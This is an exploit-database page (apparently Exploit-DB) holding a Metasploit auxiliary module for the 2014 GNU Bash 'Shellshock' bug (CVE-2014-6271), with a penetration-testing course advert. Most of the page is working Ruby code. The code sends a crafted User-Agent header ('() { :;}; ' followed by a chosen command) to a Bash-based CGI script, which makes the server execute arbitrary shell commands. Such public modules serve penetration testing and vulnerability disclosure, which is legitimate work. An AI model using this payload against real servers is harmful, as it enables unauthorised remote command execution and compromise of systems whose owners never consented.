GNU Bash - Environment Variable Command Injection (Metasploit)



Platform:

CGI

Date:

2014-09-25


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient
    

        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
                },
                'Author'         => 
                  [ 
                    'Stephane Chazelas',                      # vuln discovery 
                    'Shaun Colley <scolley at ioactive.com>'  # metasploit module
                  ],
                'License'        => MSF_LICENSE,
                'References'     => [ 'CVE', '2014-6271' ],
                'Targets'        => 
                    [
                        [ 'cgi', {} ]
                    ],
                'DefaultTarget'  => 0,
                'Payload'        =>
                    {
                    'Space'      => 1024,
                    'DisableNops' => true
                    },
                'DefaultOptions' => { 'PAYLOAD' => 0 } 
            ))

                register_options(
                    [
                        OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
                        OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
                    ], self.class)
        end

        def run 
            res = send_request_cgi({
                'method'   => 'GET',
                'uri'      => datastore['TARGETURI'],
                'agent'    => "() { :;}; " + datastore['CMD']
            })

            if res && res.code == 200
                print_good("Command sent - 200 received")
            else
                print_error("Command sent - non-200 reponse")
            end
        end
    end